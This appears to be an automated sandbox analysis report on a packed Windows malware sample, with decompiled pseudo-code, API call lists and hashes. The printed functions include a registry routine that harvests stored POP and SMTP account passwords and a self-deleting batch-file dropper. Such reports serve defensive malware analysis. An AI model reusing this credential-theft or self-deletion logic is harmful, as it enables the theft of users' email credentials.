                                                                        • Instruction Fuzzy Hash: AC01926018D7C069F351923C8815B4BAEC91BD2704F28C84EB6D8E22C2D6F98485836F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 40%
                                                                        			E0041C267(void* __ebx, void* __edx, void* __esi) {
                                                                        				void* _t14;
                                                                        				void* _t16;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        				intOrPtr* _t19;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				void* _t63;
                                                                        				signed int _t64;
                                                                        				void* _t65;
                                                                        				void* _t67;
                                                                        				void* _t84;
                                                                        				signed int _t87;
                                                                        				void* _t94;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t49 = __ebx;
                                                                        				_pop(_t60);
                                                                        				L0041C26A(_t14, __ebx, _t60, __esi, _t94);
                                                                        				_t16 =  *((intOrPtr*)(__ebx + 0x68))();
                                                                        				asm("gs insb");
                                                                        				asm("insb");
                                                                        				_pop(_t65);
                                                                        				_t67 = __esi - 1;
                                                                        				asm("outsd");
                                                                        				if(_t67 == 0) {
                                                                        					 *(_t84 - 0x70) =  *(_t84 - 0x70) | _t87;
                                                                        					_t64 = _t87;
                                                                        					L14();
                                                                        					 *_t87 =  *_t87 + 0x44fff; // executed
                                                                        					_t17 = HeapCreate(1, 0, 0); // executed
                                                                        					 *(_t84 + 8) = _t17;
                                                                        					_t61 = _t65;
                                                                        					_t18 = L0041C326(_t49, _t61, _t65, _t67, __eflags, _t94);
                                                                        					_push(_t18);
                                                                        					_t19 = _t18 - 1;
                                                                        					__eflags = _t19;
                                                                        					asm("popad");
                                                                        					if(_t19 >= 0) {
                                                                        						asm("insb");
                                                                        						asm("insb");
                                                                        						asm("outsd");
                                                                        						asm("arpl [eax], ax");
                                                                        						__eflags =  &__imp___CIcos;
                                                                        						goto L15;
                                                                        						do {
                                                                        							do {
                                                                        								do {
                                                                        									L15:
                                                                        									asm("lodsd");
                                                                        									__eflags = _t19;
                                                                        								} while (_t19 == 0);
                                                                        								__eflags =  *_t19 - 0xffffffff83ec8b55;
                                                                        							} while ( *_t19 != 0xffffffff83ec8b55);
                                                                        							__eflags =  *((intOrPtr*)(_t19 + 4)) - 0xffffffff8d560cec;
                                                                        						} while ( *((intOrPtr*)(_t19 + 4)) != 0xffffffff8d560cec);
                                                                        						 *_t87 =  *_t87 + 0x44ffe;
                                                                        						__eflags =  *_t87;
                                                                        						_t20 =  *_t19(_t87, _t61, _t64, 2, _t87, 0, 0, 0); // executed
                                                                        						return _t20;
                                                                        					}
                                                                        					return _t19;
                                                                        				} else {
                                                                        					asm("o16 jns 0x4c");
                                                                        					asm("arpl [edi+0x6e], bp");
                                                                        					 *((intOrPtr*)(_t16 - 1)) =  *((intOrPtr*)(_t16 - 1)) + __ebx;
                                                                        					_t21 = _t65;
                                                                        					_push( *((intOrPtr*)(_t84 + 0x52)));
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
                                                                        • HeapCreate.KERNELBASE ref: 0041C31D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeapIconNotifyShell_
                                                                        • String ID: KERNEL32$ZBH$e
                                                                        • API String ID: 2522922933-1899473809
                                                                        • Opcode ID: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
                                                                        • Instruction ID: 521c14249353ba93ce19dc54aff6b235836c95a5453462fa8e3fff2d8716eeda
                                                                        • Opcode Fuzzy Hash: 7427d51aef7b1708450cdbeb13e5ddfffb8de5b566c4ce4102e31af8384c4493
                                                                        • Instruction Fuzzy Hash: 34316EB2558A242EF620A1B42C65AEAB74CDB53364F61570BFE90D21C1CA2446C381FE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 04B40AA9
                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04B41A60), ref: 04B40CDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Process$CodeExitTerminate
                                                                        • String ID: ZO$mmandLineW
                                                                        • API String ID: 1523012911-2333973816
                                                                        • Opcode ID: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
                                                                        • Instruction ID: fc35b1f066d3c9b9d68727d711897ecd79719b5f3215d264125fd81cf527fddf
                                                                        • Opcode Fuzzy Hash: ddf7c80e17f3e8fad144c310dacf584b6256b6283887b87ebc2ba230b3b64169
                                                                        • Instruction Fuzzy Hash: 04210730A00606DBD718EF6CC6547A9B761FFC1324F18869DD96A67781CB34B992EF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04B4089C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: ZO$mmandLineW
                                                                        • API String ID: 963392458-2333973816
                                                                        • Opcode ID: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
                                                                        • Instruction ID: c8013028dacdbf9aacab7a98f3dc0787fc5d80be952819cc3cac3f87142682b8
                                                                        • Opcode Fuzzy Hash: 3eceb4f3697a1c5f95725fd507d957d81a4dd088abaac63583fb0849004630ba
                                                                        • Instruction Fuzzy Hash: B4719B31D047856BDB25AFAC8A1C3A97B25FFD3310B1846C5D56257293C620B883B755
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MOC$csm
                                                                        • API String ID: 0-1389381023
                                                                        • Opcode ID: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
                                                                        • Instruction ID: 74fe522de870a1d6763156c5cd42403e86f75fe636490a5e719e40e3b6e13e53
                                                                        • Opcode Fuzzy Hash: 459aa3d9913987ae39641fc249ddc2537b967027c4a915005107ac85100968f0
                                                                        • Instruction Fuzzy Hash: B4410230344506BBEB296A28C899FE8B671FB4D308F148651F72CC6561C775B8A0AB89
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: #100
                                                                        • String ID: VB5!6&*
                                                                        • API String ID: 1341478452-3593831657
                                                                        • Opcode ID: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
                                                                        • Instruction ID: 0ecceb6ba8861c98b4905b6d7a9acf2819b5a44605d6637ecb7ff1070faad8e2
                                                                        • Opcode Fuzzy Hash: 4a94630f9d0ed2b473fe86552282cdef1b35c16a5982df7e594d711faab5adad
                                                                        • Instruction Fuzzy Hash: C6B1006244E3C18FD7138B704DA55917FB0AE2321471E84EBC8C1DF4B3E22DA95AC76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041C2AB
                                                                        • HeapCreate.KERNELBASE ref: 0041C31D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateHeapIconNotifyShell_
                                                                        • String ID: KERNEL32
                                                                        • API String ID: 2522922933-1217789123
                                                                        • Opcode ID: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
                                                                        • Instruction ID: f6c9b3eb452472eef71d767f4126e5e32674215b3af36093e748069e1370d963
                                                                        • Opcode Fuzzy Hash: 1abacec55dd53c80b93eb16ec5708ea5ba95e1cb9cd8f259d6c29ad18bc844ed
                                                                        • Instruction Fuzzy Hash: F2113BA6528D342BF530A0B83C648DBB70CCE932B43522B4BFE50D10C0CA2549D385FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EnumWindows.USER32(04B403B7,?,?,00000100), ref: 04B40392
                                                                        • VirtualAllocEx.KERNELBASE(000000FF,00000000,08000000,00003000,00000040), ref: 04B403D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocEnumVirtualWindows
                                                                        • String ID:
                                                                        • API String ID: 1323281959-0
                                                                        • Opcode ID: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
                                                                        • Instruction ID: 0afd04cd968da5caffbff0d2ba2afcf4e985ed967e6ac04984ae95bb7482314c
                                                                        • Opcode Fuzzy Hash: ff10654bd0f38353a7d4d8b819bc58430c397877d55b13b1621c9b14c0716bae
                                                                        • Instruction Fuzzy Hash: 50F1692DB091918FCBA5DF25A8D8DD0BF309B8D311B4860C9C9A697717E3242517DFB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • #696.MSVBVM60(00403CA4), ref: 00421A4B
                                                                        • __vbaSetSystemError.MSVBVM60(0148CB63,00000000,00403CA4), ref: 00421A66
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: #696ErrorSystem__vba
                                                                        • String ID:
                                                                        • API String ID: 1682638366-0
                                                                        • Opcode ID: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
                                                                        • Instruction ID: cd24f5d89f5410eae393ec7b077bea812e3d8d252e5c27202905309d8a94c185
                                                                        • Opcode Fuzzy Hash: 2af48c794653242bd0cf104ee0e17f9b06a677a4218dcca10519411258dcfeb8
                                                                        • Instruction Fuzzy Hash: 5CD0223520A60129E108BEBB848AB3B29880F54F0DF20403F7200FA4D2CABC8400202F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • Sleep.KERNELBASE(0000000F,00000000,?,00000100), ref: 04B401EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649913624.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
                                                                        • Instruction ID: a483ec1a8e9bd55f9229fcb32dbac7d95ce4a45dc50c50893bf09dea7374cf80
                                                                        • Opcode Fuzzy Hash: b6e7b9debfb694aabae739e8e2bd710d8fe884214757f1165613a49155799f9e
                                                                        • Instruction Fuzzy Hash: 61019E12E40289B7EA342EEC8D4DAFD2711FBE1758F5407C1E626961ED9A207CC3B140
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 51%
                                                                        			E004218A6(void* __ebx, void* __edi, void* __esi, char __fp0, signed int _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v28;
                                                                        				intOrPtr _v36;
                                                                        				char _v44;
                                                                        				char _v64;
                                                                        				void* _t36;
                                                                        				intOrPtr* _t37;
                                                                        				void* _t38;
                                                                        				void* _t43;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				intOrPtr* _t58;
                                                                        				intOrPtr* _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				signed int _t64;
                                                                        				void* _t65;
                                                                        				void* _t67;
                                                                        				intOrPtr _t68;
                                                                        				intOrPtr _t70;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t68 = _t67 - 0xc;
                                                                        				 *[fs:0x0] = _t68;
                                                                        				_v16 = _t68 - 0x44;
                                                                        				_v12 = 0x4010a0;
                                                                        				_t63 = _a4;
                                                                        				_v8 = _t63 & 0x00000001;
                                                                        				_t64 = _t63 & 0xfffffffe;
                                                                        				_a4 = _t64;
                                                                        				 *((intOrPtr*)( *_t64 + 4))(_t64, __edi, __esi, __ebx,  *[fs:0x0], 0x4010b6, _t65);
                                                                        				_v44 = 0;
                                                                        				_push( &_v44);
                                                                        				_v28 = 0;
                                                                        				_v64 = 0;
                                                                        				_v36 = 0x80020004;
                                                                        				_v44 = 0xa;
                                                                        				L0040116A();
                                                                        				_v64 = __fp0;
                                                                        				L00401164();
                                                                        				_t70 =  *0x4229d4; // 0x2151b2c
                                                                        				if(_t70 == 0) {
                                                                        					_push(0x4229d4);
                                                                        					_push(0x403c80);
                                                                        					L0040115E();
                                                                        				}
                                                                        				_t58 =  *0x4229d4; // 0x2151b2c
                                                                        				_t36 =  *((intOrPtr*)( *_t58 + 0x4c))(_t58,  &_v28);
                                                                        				asm("fclex");
                                                                        				if(_t36 < 0) {
                                                                        					_push(0x4c);
                                                                        					_push(0x403c70);
                                                                        					_push(_t58);
                                                                        					_push(_t36);
                                                                        					L00401158();
                                                                        				}
                                                                        				_t37 = _v28;
                                                                        				_t59 = _t37;
                                                                        				_t38 =  *((intOrPtr*)( *_t37 + 0x20))(_t37,  &_v64);
                                                                        				asm("fclex");
                                                                        				if(_t38 < 0) {
                                                                        					_push(0x20);
                                                                        					_push(0x403c90);
                                                                        					_push(_t59);
                                                                        					_push(_t38);
                                                                        					L00401158();
                                                                        				}
                                                                        				L00401152();
                                                                        				if( ~(0 | _v64 != 0x00000000) != 0) {
                                                                        					_t49 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
                                                                        					if(_t49 < 0) {
                                                                        						_push(0x6fc);
                                                                        						_push(0x403a74);
                                                                        						_push(_t64);
                                                                        						_push(_t49);
                                                                        						L00401158();
                                                                        					}
                                                                        				}
                                                                        				_t76 =  *0x422010; // 0x72fd88
                                                                        				if(_t76 == 0) {
                                                                        					_push(0x422010);
                                                                        					_push(0x402bdc);
                                                                        					L0040115E();
                                                                        				}
                                                                        				_t61 =  *0x422010; // 0x72fd88
                                                                        				_t43 =  *((intOrPtr*)( *_t61 + 0x2b4))(_t61);
                                                                        				asm("fclex");
                                                                        				if(_t43 < 0) {
                                                                        					_push(0x2b4);
                                                                        					_push(0x403a40);
                                                                        					_push(_t61);
                                                                        					_push(_t43);
                                                                        					L00401158();
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t64 + 0x700))(_t64);
                                                                        				_t47 =  *((intOrPtr*)( *_t64 + 0x6fc))(_t64);
                                                                        				if(_t47 < 0) {
                                                                        					_push(0x6fc);
                                                                        					_push(0x403a74);
                                                                        					_push(_t64);
                                                                        					_push(_t47);
                                                                        					L00401158();
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				asm("wait");
                                                                        				_push(E00421A29);
                                                                        				return _t47;
                                                                        			}



























                                                                        APIs
                                                                        • #593.MSVBVM60(?), ref: 00421903
                                                                        • __vbaFreeVar.MSVBVM60(?), ref: 0042190E
                                                                        • __vbaNew2.MSVBVM60(00403C80,004229D4,?), ref: 00421925
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,02151B2C,00403C70,0000004C), ref: 00421949
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 0042196C
                                                                        • __vbaFreeObj.MSVBVM60(00000000,?,00403C90,00000020), ref: 00421980
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 004219A3
                                                                        • __vbaNew2.MSVBVM60(00402BDC,00422010), ref: 004219BA
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,0072FD88,00403A40,000002B4), ref: 004219E0
                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,004010A0,00403A74,000006FC), ref: 00421A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.649348743.0000000000421000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.649325933.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649332210.0000000000401000.00000020.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649352878.0000000000422000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649358085.000000000042A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.649363001.000000000042B000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: __vba$CheckHresult$FreeNew2$#593
                                                                        • String ID:
                                                                        • API String ID: 734493984-0
                                                                        • Opcode ID: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
                                                                        • Instruction ID: c2a4e496c33e5a95fca38fc57b841067e4aaf942ed9135cbc122c6ee08ed05d7
                                                                        • Opcode Fuzzy Hash: 83c8c74c4005b6d249c17afc8bbb60808a59098d24549a08e06e30d82bd268f6
                                                                        • Instruction Fuzzy Hash: 0E419FB0B00219ABCB10AFA5CC89E9E7BB9AF59704F60043BF145B72A1C7785985CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 100%
                                                                        			E004106D5(void* __eax, void* __edx, void* __eflags) {
                                                                        				CHAR* _v8;
                                                                        				char* _v12;
                                                                        				void* _v16;
                                                                        				char* _v20;
                                                                        				CHAR* _v24;
                                                                        				char* _t34;
                                                                        				char* _t35;
                                                                        				void* _t39;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				struct HINSTANCE__* _t49;
                                                                        				char* _t59;
                                                                        				void* _t60;
                                                                        
                                                                        				_v24 = E004017EC(0x105);
                                                                        				wsprintfA(_v24, "%d.bat", GetTickCount());
                                                                        				_v8 = E004017EC(0x105);
                                                                        				_t34 = E004017EC(0x105);
                                                                        				_v20 = _t34;
                                                                        				_t35 = E004017EC(0x105);
                                                                        				_v12 = _t35;
                                                                        				GetModuleFileNameA( *0x4176b6, _v8, 0x104);
                                                                        				if(GetTempPathA(0x104, _v20) != 0) {
                                                                        					lstrcatA(_v20, _v24);
                                                                        				}
                                                                        				_t39 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0); // executed
                                                                        				_v16 = _t39;
                                                                        				if((_t39 + 0x00000001 & _t39 + 0x00000001) != 0) {
                                                                        					L6:
                                                                        					_t43 = E004013C2(_v16, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", lstrlenA("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ")); // executed
                                                                        					CloseHandle(_v16);
                                                                        					_t45 = _t43;
                                                                        					if(_t45 != 0) {
                                                                        						wsprintfA(_v12, "      \"%s\"   ", _v8);
                                                                        						_t49 = LoadLibraryA("shell32.dll");
                                                                        						if(_t49 != 0 && GetProcAddress(_t49, "ShellExecuteA") != 0) {
                                                                        							ShellExecuteA(0, "open", _v20, _v12, 0, 0); // executed
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					E004017D5(_v24);
                                                                        					E004017D5(_v8);
                                                                        					E004017D5(_v20);
                                                                        					return E004017D5(_v12);
                                                                        				}
                                                                        				lstrcpyA(_v20, _v8);
                                                                        				_t59 = StrRChrIA(_v20, 0, 0x5c);
                                                                        				if(_t59 != 0) {
                                                                        					lstrcpyA(_t59 + 1, _v24);
                                                                        				}
                                                                        				_t60 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0);
                                                                        				_v16 = _t60;
                                                                        				if(_t60 + 1 == 0) {
                                                                        					goto L11;
                                                                        				} else {
                                                                        					goto L6;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GetTickCount.KERNEL32 ref: 004106FA
                                                                        • wsprintfA.USER32 ref: 00410708
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410768
                                                                        • GetTempPathA.KERNEL32(00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0041077E
                                                                        • lstrcatA.KERNEL32(?,?,00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410792
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107AB
                                                                        • lstrcpyA.KERNEL32(?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107C2
                                                                        • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104), ref: 004107CE
                                                                        • lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004107DC
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000), ref: 004107F3
                                                                        • lstrlenA.KERNEL32( :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 00410803
                                                                        • CloseHandle.KERNEL32(00410C71,00000000,00410C71, :ktk del %1 if exist %1 goto ktk del %0 ,00000000, :ktk del %1 if exist %1 goto ktk del %0 ,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000), ref: 0041081A
                                                                        • wsprintfA.USER32 ref: 00410831
                                                                        • LoadLibraryA.KERNEL32(shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 0041083E
                                                                        • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0041084D
                                                                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000,00000000,ShellExecuteA,shell32.dll,00000105,00000105,00000105,?,?,00000105), ref: 00410867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$Createlstrcpywsprintf$AddressAllocCloseCountExecuteHandleLibraryLoadLocalModuleNamePathProcShellTempTicklstrcatlstrlen
                                                                        • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                                                                        • API String ID: 2116904195-4169620016
                                                                        • Opcode ID: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
                                                                        • Instruction ID: ac578fb0db49b64cbbfa247985a17d63ff0acc43852cd1b9113235f47bfa6a9d
                                                                        • Opcode Fuzzy Hash: 5a27ab0cd15915a05e5231e08fcaa6e6ad12822a77b34612db5ee9e6cc8e6732
                                                                        • Instruction Fuzzy Hash: ED419E31B446057BDF19A6A68C03FEFB5B79B84704F24803A7215F62E1EAB84DC09A4C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040EC16(void* _a4, char* _a8, intOrPtr _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				char* _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				intOrPtr _v2084;
                                                                        				char _v2088;
                                                                        				intOrPtr _v2092;
                                                                        				intOrPtr _v2096;
                                                                        				char _v2100;
                                                                        				intOrPtr _v2104;
                                                                        				intOrPtr _v2108;
                                                                        				char _v2112;
                                                                        				intOrPtr _v2116;
                                                                        				intOrPtr _v2120;
                                                                        				char _v2124;
                                                                        				long _t93;
                                                                        				long _t94;
                                                                        
                                                                        				_t93 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                        				_t94 = _t93;
                                                                        				if(_t94 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D69(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						_v2072 = E00401C8E(_a4, _v2068, "EmailAddress", 0);
                                                                        						_v2076 = E00401C8E(_a4, _v2068, "Technology", 0);
                                                                        						_v2080 = E00401C8E(_a4, _v2068, "PopServer", 0);
                                                                        						_v2084 = E00401C8E(_a4, _v2068, "PopPort",  &_v2088);
                                                                        						_v2092 = E00401C8E(_a4, _v2068, "PopAccount", 0);
                                                                        						_v2096 = E00401C8E(_a4, _v2068, "PopPassword",  &_v2100);
                                                                        						_v2104 = E00401C8E(_a4, _v2068, "SmtpServer", 0);
                                                                        						_v2108 = E00401C8E(_a4, _v2068, "SmtpPort",  &_v2112);
                                                                        						_v2116 = E00401C8E(_a4, _v2068, "SmtpAccount", 0);
                                                                        						_v2120 = E00401C8E(_a4, _v2068, "SmtpPassword",  &_v2124);
                                                                        						if(_v2072 != 0 && (_v2100 != 0 || _v2124 != 0)) {
                                                                        							E00401486(_a12, 0xbeef0000);
                                                                        							E004014E8(_a12, _v2072);
                                                                        							E004014E8(_a12, _v2076);
                                                                        							E004014E8(_a12, _v2080);
                                                                        							E004014BC(_a12, _v2084, _v2088);
                                                                        							E004014E8(_a12, _v2092);
                                                                        							E004014BC(_a12, _v2096, _v2100);
                                                                        							E004014E8(_a12, _v2104);
                                                                        							E004014BC(_a12, _v2108, _v2112);
                                                                        							E004014E8(_a12, _v2116);
                                                                        							E004014BC(_a12, _v2120, _v2124);
                                                                        						}
                                                                        						E0040EC16(_a4, _v2068, _a12);
                                                                        						E004017D5(_v2068);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2084);
                                                                        						E004017D5(_v2092);
                                                                        						E004017D5(_v2096);
                                                                        						E004017D5(_v2104);
                                                                        						E004017D5(_v2108);
                                                                        						E004017D5(_v2116);
                                                                        						E004017D5(_v2120);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t94;
                                                                        			}

























                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EC29
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040EC5D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EF18
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
